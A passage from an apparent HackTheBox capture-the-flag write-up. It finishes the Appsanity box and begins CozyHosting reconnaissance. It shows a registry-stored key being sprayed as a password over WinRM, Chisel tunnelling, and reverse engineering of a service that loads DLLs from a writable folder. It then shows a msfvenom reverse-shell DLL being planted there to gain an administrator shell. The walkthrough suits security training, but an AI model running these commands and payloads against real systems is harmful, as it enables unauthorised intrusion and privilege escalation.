-a---- 9/24/2023 8:46 AM 431792 System.Data.SQLite.dll
-a---- 9/24/2023 8:46 AM 206512 System.Data.SQLite.EF6.dll
-a---- 9/24/2023 8:46 AM 206520 System.Data.SQLite.Linq.dll
All but one of these, if I search for them, return references to frameworks for web development in .NET. ExaminationManagement.dll
is custom to Appsanity.
I’ll start an SMB server on my host using Impacket’s smbserver.py
:
oxdf@hacky$ smbserver.py -smb2support -username oxdf -password oxdf share `pwd`
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Now on Appsantiy I’ll connect to the share and copy the file into it:
PS C:\> net use \\10.10.14.6\share /u:oxdf oxdf
The command completed successfully.
PS C:\> copy \inetpub\ExaminationPanel\ExaminationPanel\bin\examinationManagement.dll \\10.10.14.6\share\
I’ve got the file on my system:
oxdf@hacky$ file ExaminationManagement.dll
ExaminationManagement.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
My tool of choice at the moment for reversing .NET binaries is DotPeek, though if I wanted to stay on a Linux VM I could use ILSpy.
I’ll open it up, and take a look:
Looking at index
, there are functions related to encryption / decryption:
RetrieveEncryptionKeyFromRegistery
is an interesting sounding function:
private string RetrieveEncryptionKeyFromRegistry()
{
try
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\MedDigi"))
{
if (registryKey == null)
{
ErrorLogger.LogError("Registry Key Not Found");
this.Response.Redirect("Error.aspx?message=error+occurred");
return (string) null;
}
object obj = registryKey.GetValue("EncKey");
if (obj != null)
return obj.ToString();
ErrorLogger.LogError("Encryption Key Not Found in Registry");
this.Response.Redirect("Error.aspx?message=error+occurred");
return (string) null;
}
}
catch (Exception ex)
{
ErrorLogger.LogError("Error Retrieving Encryption Key", ex);
this.Response.Redirect("Error.aspx?message=error+occurred");
return (string) null;
}
}
It reads from the Local Machine
hive the key Software\MedDigi
, getting the value EncKey
.
In PowerShell, I can enter registry hives like drives with directories:
PS C:\inetpub> cd hklm:\Software\MedDigi
PS HKLM:\Software\MedDigi>
Get-ItemProperty
will show the values of this key:
PS HKLM:\Software\MedDigi> Get-ItemProperty .
EncKey : 1g0tTh3R3m3dy!!
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\MedDigi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software
PSChildName : MedDigi
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
The EncKey
is “1g0tTh3R3m3dy!!”.
To check if any known user on this box uses this key, I’ll save all the users from net user
in a file on my host and spray with NetExec. SMB isn’t accessible, but I can try WinRM:
oxdf@hacky$ netexec winrm meddigi.htb -u users -p '1g0tTh3R3m3dy!!' --continue-on-success
WINRM 10.10.11.238 5985 APPSANITY [*] Windows 10 / Server 2019 Build 19041 (name:APPSANITY) (domain:Appsanity)
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\Administrator:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\DefaultAccount:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [+] Appsanity\devdoc:1g0tTh3R3m3dy!! (Pwn3d!)
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\Guest:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\svc_exampanel:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\svc_meddigi:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\svc_meddigiportal:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\WDAGUtilityAccount:1g0tTh3R3m3dy!!
I like --continue-on-success
to see if multiple users share the password. It works for devdoc, and gets a shell with Evil-WinRM:
oxdf@hacky$ evil-winrm -i meddigi.htb -u devdoc -p '1g0tTh3R3m3dy!!'
Evil-WinRM shell v3.4
*Evil-WinRM* PS C:\Users\devdoc\Documents>
In looking around the host, I’ll notice there are a bunch more ports listening than the three I can connect to from my host:
*Evil-WinRM* PS C:\Users\devdoc\Documents> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 4880
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 1280
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 532
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1116
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1528
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 10.10.11.238:139 0.0.0.0:0 LISTENING 4
TCP 10.10.11.238:5985 10.10.14.6:44310 ESTABLISHED 4
TCP 10.10.11.238:62885 10.10.14.6:443 ESTABLISHED 4480
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 924
TCP [::]:443 [::]:0 LISTENING 4
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 692
TCP [::]:49665 [::]:0 LISTENING 532
TCP [::]:49666 [::]:0 LISTENING 1116
TCP [::]:49667 [::]:0 LISTENING 1528
TCP [::]:49668 [::]:0 LISTENING 668
UDP 0.0.0.0:123 *:* 5992
UDP 0.0.0.0:5050 *:* 1280
UDP 0.0.0.0:5353 *:* 1948
UDP 0.0.0.0:5355 *:* 1948
UDP 10.10.11.238:137 *:* 4
UDP 10.10.11.238:138 *:* 4
UDP 10.10.11.238:1900 *:* 3332
UDP 10.10.11.238:65138 *:* 3332
UDP 127.0.0.1:1900 *:* 3332
UDP 127.0.0.1:49664 *:* 2024
UDP 127.0.0.1:65139 *:* 3332
UDP [::]:123 *:* 5992
UDP [::1]:1900 *:* 3332
UDP [::1]:65137 *:* 3332
Before I start pinging SMB and LDAP, port 100 jumps out as unusual. The output above shows this as PID 4880, which I can get from the process list if I’m fast:
*Evil-WinRM* PS C:\Users\devdoc\Documents> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
76 5 2976 4140 2312 0 cmd
134 9 4196 1656 688 0 conhost
113 8 6336 10932 780 0 conhost
134 9 4528 1504 1020 0 conhost
134 9 4200 2968 4948 0 conhost
552 22 1772 5420 424 0 csrss
177 10 1604 4968 540 1 csrss
122 7 1128 5620 2828 0 dasHost
262 14 3916 14348 3668 0 dllhost
698 29 26664 56896 60 1 dwm
36 5 1456 3760 820 0 fontdrvhost
36 5 1480 3752 828 1 fontdrvhost
0 0 60 8 0 0 Idle
748 39 20076 66328 3488 1 LogonUI
1141 23 5804 17496 692 0 lsass
0 0 276 4496 1596 0 Memory Compression
210 13 2044 4060 1996 0 MicrosoftEdgeUpdate
230 13 2972 10860 4136 0 msdtc
437 16 4424 17656 2808 0 MsMpEng
1467 27 115832 126996 900 0 powershell
418 36 112660 6764 2332 0 powershell
554 40 132664 23448 2344 0 powershell
433 38 118200 6680 2352 0 powershell
0 13 2972 20392 92 0 Registry
143 9 1424 6908 4880 0 ReportManagement
190 11 2620 12368 896 0 SearchFilterHost
794 66 33888 42148 3196 0 SearchIndexer
360 14 2800 11152 1984 0 SearchProtocolHost
589 11 5084 10212 668 0 services
106 8 4180 7436 2956 0 SgrmBroker
53 3 1056 1152 320 0 smss
269 13 3376 11616 348 0 svchost
112 7 1240 5500 404 0 svchost
187 11 1812 8592 748 0 svchost
126 7 1288 6044 756 0 svchost
1507 16 10456 20680 800 0 svchost
822 17 18664 25340 924 0 svchost
234 9 2052 7592 972 0 svchost
124 7 2248 7540 1008 0 svchost
197 13 1904 8912 1016 0 svchost
254 7 1444 6364 1072 0 svchost
347 13 12392 16560 1116 0 svchost
124 15 3096 7480 1200 0 svchost
121 8 1392 7440 1260 0 svchost
316 19 4280 17212 1280 0 svchost
207 9 2072 7444 1328 0 svchost
224 12 2912 12116 1400 0 svchost
426 9 2900 9184 1412 0 svchost
191 10 2348 9720 1440 0 svchost
118 7 1208 5908 1468 0 svchost
393 17 6196 16056 1528 0 svchost
389 13 4068 11940 1576 0 svchost
130 8 1308 6000 1648 0 svchost
147 9 1552 7824 1716 0 svchost
158 10 1892 8516 1732 0 svchost
420 12 2884 10056 1808 0 svchost
189 15 5996 9876 1820 0 svchost
191 10 1876 8588 1888 0 svchost
251 12 2780 8380 1948 0 svchost
130 9 1556 6684 1956 0 svchost
362 12 2200 9908 1972 0 svchost
365 15 2724 11012 2024 0 svchost
407 32 10680 20024 2056 0 svchost
186 11 2068 8672 2132 0 svchost
176 10 1920 8968 2180 0 svchost
164 9 1948 7784 2208 0 svchost
169 12 3984 11444 2456 0 svchost
241 25 3304 12924 2464 0 svchost
130 7 1272 6432 2480 0 svchost
457 24 21240 37188 2500 0 svchost
321 18 22452 29548 2516 0 svchost
419 17 11764 22144 2536 0 svchost
133 9 1576 7000 2616 0 svchost
128 7 1248 5796 2632 0 svchost
209 12 2460 9640 2648 0 svchost
199 11 2840 16000 2724 0 svchost
251 15 4768 12860 2740 0 svchost
208 12 1944 7640 2868 0 svchost
105 7 1232 5640 2912 0 svchost
336 20 5940 24004 2932 0 svchost
400 26 3620 14176 3164 0 svchost
231 14 2092 7836 3332 0 svchost
210 12 2860 10832 3560 0 svchost
162 10 1832 7660 3596 0 svchost
261 8 1616 7720 4072 0 svchost
206 11 1884 8664 4292 0 svchost
216 13 2932 12128 4380 0 svchost
442 27 9128 18364 4384 0 svchost
131 8 6688 14344 4392 0 svchost
230 14 5048 17672 4544 0 svchost
181 10 3372 7696 4860 0 svchost
169 11 2572 13748 5448 0 svchost
244 14 3252 13332 5460 0 svchost
255 19 3204 12376 5576 0 svchost
204 12 1728 7724 5992 0 svchost
211 11 2480 11344 6000 0 svchost
1849 0 196 112 4 0 System
170 11 2868 11220 2640 0 VGAuthService
118 7 1440 6260 2688 0 vm3dservice
116 8 1516 6672 3044 1 vm3dservice
113 8 1436 6588 3940 1 vm3dservice
395 22 10904 22676 2664 0 vmtoolsd
895 59 233804 227904 4480 0 w3wp
164 11 1372 7176 532 0 wininit
246 13 2772 19988 600 1 winlogon
360 17 132784 141760 3964 0 WmiPrvSE
863 28 59708 74808 0.81 2272 0 wsmprovhost
The process seems to be restarting quickly, so I’ll write a single line of PowerShell to get the process id and then pull the process information:
*Evil-WinRM* PS C:\Users\devdoc\Documents> Get-Process -Id (netstat -ano | findstr 100 | select-string -pattern '\s+(\d+)$').Matches.Groups[1].Value
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
143 10 1500 6952 296 0 ReportManagement
The process listening on port 100 is ReportManagement
.
There’s a directory in C:\Program Files\
named ReportManagement
:
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2023 7:36 AM Common Files
d----- 9/15/2023 8:16 AM dotnet
d----- 9/15/2023 8:16 AM IIS
d----- 10/23/2023 12:17 PM Internet Explorer
d----- 9/17/2023 3:23 AM Microsoft Update Health Tools
d----- 12/7/2019 1:14 AM ModifiableWindowsApps
d----- 10/20/2023 12:42 PM ReportManagement
d----- 10/23/2023 4:59 PM RUXIM
d----- 9/15/2023 7:36 AM VMware
d----- 10/23/2023 12:17 PM Windows Defender
d----- 10/23/2023 12:17 PM Windows Defender Advanced Threat Protection
d----- 10/23/2023 12:17 PM Windows Mail
d----- 12/7/2019 1:54 AM Windows Multimedia Platform
d----- 12/7/2019 1:50 AM Windows NT
d----- 10/23/2023 12:17 PM Windows Photo Viewer
d----- 12/7/2019 1:54 AM Windows Portable Devices
d----- 12/7/2019 1:31 AM Windows Security
d----- 12/7/2019 1:31 AM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cd ReportManagement
*Evil-WinRM* PS C:\Program Files\ReportManagement> ls
Directory: C:\Program Files\ReportManagement
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2023 11:33 AM Libraries
-a---- 5/5/2023 5:21 AM 34152 cryptbase.dll
-a---- 5/5/2023 5:21 AM 83744 cryptsp.dll
-a---- 3/11/2021 9:22 AM 564112 msvcp140.dll
-a---- 9/17/2023 3:54 AM 140512 profapi.dll
-a---- 10/20/2023 2:56 PM 102912 ReportManagement.exe
-a---- 10/20/2023 1:47 PM 11492864 ReportManagementHelper.exe
-a---- 3/11/2021 9:22 AM 96144 vcruntime140.dll
-a---- 3/11/2021 9:22 AM 36752 vcruntime140_1.dll
-a---- 5/5/2023 5:21 AM 179248 wldp.dll
All of this enumeration could have been done as svc_exampanel, but it’s worth noting that that user couldn’t read this binary:
*Evil-WinRM* PS C:\Program Files\ReportManagement> icacls ReportManagement.exe
ReportManagement.exe APPSANITY\devdoc:(DENY)(W,X)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
APPSANITY\devdoc:(R)
Successfully processed 1 files; Failed processing 0 files
While looking at permissions in this directory, I’ll notice that the Libraries
directory is owned by devdoc:
*Evil-WinRM* PS C:\Program Files\ReportManagement>icacls Libraries
Libraries APPSANITY\devdoc:(OI)(CI)(RX,W)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(R)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
It is currently empty, which is suspicious.
devdoc cannot access the ReportManagementHelper.exe
binary:
*Evil-WinRM* PS C:\Program Files\ReportManagement> icacls ReportManagementHelper.exe
Successfully processed 0 files; Failed processing 1 files
icacls.exe : ReportManagementHelper.exe: Access is denied.
+ CategoryInfo : NotSpecified: (ReportManagemen...cess is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Trying to interact with the binary doesn’t work over HTTP or HTTPS:
*Evil-WinRM* PS C:\Program Files\ReportManagement> curl http://localhost:100
The server committed a protocol violation. Section=ResponseStatusLine
At line:1 char:1
+ curl http://localhost:100
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
*Evil-WinRM* PS C:\Program Files\ReportManagement> curl https://localhost:100
The underlying connection was closed: An unexpected error occurred on a send.
At line:1 char:1
+ curl https://localhost:100
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
I’ll start the Chisel server on my VM and upload the Windows binary to Appsanity to get a tunnel to localhost:
*Evil-WinRM* PS C:\programdata> upload /opt/chisel/chisel_1.9.1_windows_amd64 \programdata\c.exe
Info: Uploading /opt/chisel/chisel_1.9.1_windows_amd64 to \programdata\c.exe
Data: 12008104 bytes of 12008104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\c.exe client 10.10.14.6:8000 R:10000:127.0.0.1:100
c.exe : 2024/03/02 03:44:29 client: Connecting to ws://10.10.14.6:8000
+ CategoryInfo : NotSpecified: (2024/03/02 03:4...10.10.14.6:8000:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2024/03/02 03:44:30 client: Connected (Latency 97.2358ms)
There’s an error, but my server shows the tunnel:
oxdf@hacky$ ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
2024/03/02 06:37:42 server: Reverse tunnelling enabled
2024/03/02 06:37:42 server: Fingerprint ds0r8UB0J6WEjmcpLmdcmd7E4Y2D8azZsiBUTmwDJf0=
2024/03/02 06:37:42 server: Listening on http://0.0.0.0:8000
2024/03/02 06:44:27 server: session#18: tun: proxy#R:10000=>100: Listening
And I can interact with it over nc
:
oxdf@hacky$ nc localhost 10000
Reports Management administrative console. Type "help" to view available commands.
help
shows the commands:
help
Available Commands:
backup: Perform a backup operation.
validate: Validates if any report has been altered since the last backup.
recover <filename>: Restores a specified file from the backup to the Reports folder.
upload <external source>: Uploads the reports to the specified external source.
I can try some of the commands, but nothing too interesting:
backup
Backup operation completed successfully.
validate
Validation completed. All reports are intact.
recover \users\administator\desktop\root.txt
Specified file not found in the backup directory.
upload 10.10.14.6
Failed to upload to external source.
There’s no connect back to my host that I see on the upload
command.
I’ll copy all the files that I can back to my host using SMB again. As noted above, devdoc doesn’t have read access to ReportManagementHelper.exe
.
oxdf@hacky$ file *
cryptbase.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
cryptsp.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
Libraries: directory
msvcp140.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
profapi.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
ReportManagement.exe: PE32+ executable (GUI) x86-64, for MS Windows
vcruntime140_1.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
vcruntime140.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
wldp.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
These are not .NET binaries, so I’ll use Ghidra, starting with ReportManagement.exe
. Looking at the strings to get oriented, there are a bunch of interesting ones all grouped together in memory and where they are referenced:
There’s a couple references to upload. There’s a reference to the binary I can’t access, ReportManagementHelper
, and cmd.exe
. There’s the writable Libraries
directory. And “externalupload” and “dll”. Each of these strings is used in FUN_1400042b0
.
This function is huge, and the decompile from Ghidra is a mess. The decompilation output is 2212 lines.
After 317 lines of declaring variables, there’s a reference to reportmanagement_log.txt
, and then it enters a do while true loop starting at line 340 in my Ghidra output:
There is a call to CreateProcessW
shortly after the reference to ReportManagementHelper.exe
, which would make sense to have that called:
I’ll copy all the files I have to my Windows VM in a folder on my Desktop. I’ll also start Process Monitor (or ProcMon) running to collect events.
When I run ReportManagement.exe
, it creates a reportmanagement_log.txt
file in ~/logs
. This file shows an error that it failed to find a directory:
It’s not important to find this log, as I would find this also using ProcMon. I’ll also note that the process runs in the background and listens on TCP 100 (notice the PID matches) just like on Appsanity:
PS C:\Users\0xdf > Get-Process -name ReportManagement
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
121 9 1428 7348 0.05 4008 1 ReportManagement
PS C:\Users\0xdf > netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 4008
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 988
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1744
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 736
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 584
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1204
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1244
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2584
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 2824
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 724
TCP 10.0.2.15:139 0.0.0.0:0 LISTENING 4
TCP 10.0.2.15:53446 204.79.197.239:443 FIN_WAIT_2 5548
TCP [::]:135 [::]:0 LISTENING 988
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 1744
TCP [::]:49664 [::]:0 LISTENING 736
TCP [::]:49665 [::]:0 LISTENING 584
TCP [::]:49666 [::]:0 LISTENING 1204
TCP [::]:49667 [::]:0 LISTENING 1244
TCP [::]:49668 [::]:0 LISTENING 2584
TCP [::]:49669 [::]:0 LISTENING 2824
TCP [::]:49670 [::]:0 LISTENING 724
UDP 0.0.0.0:500 *:* 2816
UDP 0.0.0.0:4500 *:* 2816
UDP 0.0.0.0:5050 *:* 620
UDP 0.0.0.0:5353 *:* 2232
UDP 0.0.0.0:5355 *:* 2232
UDP 10.0.2.15:137 *:* 4
UDP 10.0.2.15:138 *:* 4
UDP 10.0.2.15:1900 *:* 2172
UDP 10.0.2.15:54746 *:* 2172
UDP 127.0.0.1:1900 *:* 2172
UDP 127.0.0.1:52691 *:* 3124
UDP 127.0.0.1:54747 *:* 2172
UDP [::]:500 *:* 2816
UDP [::]:4500 *:* 2816
UDP [::1]:1900 *:* 2172
UDP [::1]:54745 *:* 2172
In ProcMon, I’ll set up a filter so that I only get events from ReportManagement.exe
, and to start, I’ll look at attempts to interact with files that fail by filtering on CreateFile
operations that result in anything but SUCCESS
:
There’s a bunch of failures trying to open C:\inetpub\ExaminationPanel\ExaminationPanel\Reports
:
The .exe.mun
file is something related to resources, which I’ll ignore for now. I’ll run stop-process -name ReportManagement
in PowerShell, create this directory, and run it again. This time it fails to find C:\Users\Administrator\Backup
. I’ll create this as well. Now when I run, no failures.
Given all the interesting strings in the binary were used between messages about uploading, I’ll start by focusing on the upload
command. I’ll connect to my local instance and enter upload 0xdf
(as the command takes an “external source”). It’s not important what I put for the source, but I want something that might fail to see where it fails.
When I do, there’s another failure in ProcMon, showing a failure:
I’ll move my ReportManagement
directory into C:\Program Files
and continue. Now there are no errors.
I’ll run the program in x64dbg, but it doesn’t reach the CreateProcessW
call.
The writable Libraries
directory seems important, so I’ll go back to where that’s used. The code is still very hard to understand, but there are references to directory_iterator
and directory_entry
:
Given that, I’ll create a few files in my local Libraries
:
PS C:\Program Files\ReportManagement\Libraries > ls
Directory: C:\Program Files\ReportManagement\Libraries
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2024 11:26 AM 0 test.dll
-a---- 3/8/2024 11:26 AM 0 test.exe
-a---- 3/8/2024 11:26 AM 0 test.txt
Now I’ll start the program in x64dbg. There’s a while loop that starts at 140004900 that only enters if there are files in Libraries
. Stepping into the loop, it loads the string .dll
, and then test.dll
:
Still, it doesn’t reach CreateProcessW
. A bit further down, the “externaupload” string is referenced with a memcmp
:
To get here, there are a series of checks. So the loop goes over each file in Libraries
. If it has the .dll
extension, then it finds the first “e” (memchr
call at 1400004cb5) and compares the string from that point to “externalupload” (memcmp
at 140004ce0). If that matches, then it reaches the CreateProcessW
call (at 140005387):
The command would be cmd.exe /c ReportManagementHelper Libraries\externalupload.dll
.
I don’t have access to ReportManagementHelper.exe
, but it seems if there’s a externalupload.dll
in Libraries
that it will be passed to that executable when it is called, which suggests it will be loaded. Since I can write to Libraries
, I’ll generate a malicious DLL that creates a reverse shell, upload it, and then connect and trigger it.
I haven’t seen any AV running here, so the simplest idea is to generate a DLL payload using msfvenom
from Metasploit.
oxdf@hacky$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=443 -f dll -o externalupload.dll -a x64 --platform windows
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: externalupload.dll
I’m using an unstaged payload so I can catch it in nc
. If I had used windows/x64/shell/reverse/tcp
, that would create one I had to catch in Metasploit.
I’ll upload this to the Libraries
directory:
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> upload externalupload.dll
Info: Uploading externalupload.dll to C:\Program Files\ReportManagement\Libraries\externalupload.dll
Data: 12288 bytes of 12288 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> ls
Directory: C:\Program Files\ReportManagement\Libraries
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2024 9:19 AM 9216 externalupload.dll
Now I’ll connect to the service over my Chisel tunnel and trigger it:
oxdf@hacky$ rlwrap nc localhost 10000
Reports Management administrative console. Type "help" to view available commands.
upload 0xdf
Attempting to upload to external source.
It hangs, and there’s a shell as administrator:
oxdf@hacky$ rlwrap -cAr nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.238 49268
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\ReportManagement> whoami
appsanity\administrator
And root.txt
:
C:\Users\Administrator\Desktop> type root.txt
78eae46d************************
CozyHosting is a web hosting company with a website running on Java Spring Boot. I’ll find a Spring Boot Actuator path that leaks the session id of a logged in user, and use that to get access to the site. Once there, I’ll find command injection in a admin feature to get a foothold. I’ll pull database creds from the Java Jar file and use them to get the admin’s hash on the website from Postgres, which is also the user’s password on the box. From there, I’ll abuse sudo ssh with the ProxyCommand option to get root.
Name | CozyHosting Play on HackTheBox |
---|---|
Release Date | 02 Sep 2023 |
Retire Date | 02 Mar 2024 |
OS | Linux |
Base Points | Easy [20] |
Rated Difficulty | |
Radar Graph | |
00:11:50 | |
00:12:35 | |
Creator |
nmap
finds two open TCP ports, SSH (22) and HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.230
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 18:51 EST
Nmap scan report for 10.10.11.230
Host is up (0.12s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.230
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 18:52 EST
Nmap scan report for 10.10.11.230
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.
The HTTP server on 80 is redirecting to cozyhosting.htb
. Given the use of host based routing, I’ll fuzz for other subdomains that reply differently, but not find any.
The site is for a web hosting company:
All of the links on the page except for the “Login” button at the top right go to other places on the page.
The login page asks for username and password:
Some simple guesses like admin / admin don’t work.
The HTTP response headers show nginx as the web server:
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 27 Feb 2024 00:02:38 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Language: en-US
Content-Length: 12706
There are some other less common headers, but nothing that identifies what’s in use. When I try to log in, even on failure, there’s a cookie set:
HTTP/1.1 302
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 27 Feb 2024 11:23:38 GMT
Content-Length: 0
Location: http://cozyhosting.htb/login?error
Connection: close
Set-Cookie: JSESSIONID=1557523182BEB62C96303F5C105972D5; Path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
JSESSIONID
suggests a Java-based web framework.
The 404 page is interesting:
That matches the default error page for Java Spring Boot:
I’ll run feroxbuster
against the site:
oxdf@hacky$ feroxbuster -u http://cozyhosting.htb
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 97l 196w 4431c http://cozyhosting.htb/login
204 GET 0l 0w 0c http://cozyhosting.htb/logout
401 GET 1l 1w 97c http://cozyhosting.htb/admin
200 GET 285l 745w 12706c http://cozyhosting.htb/
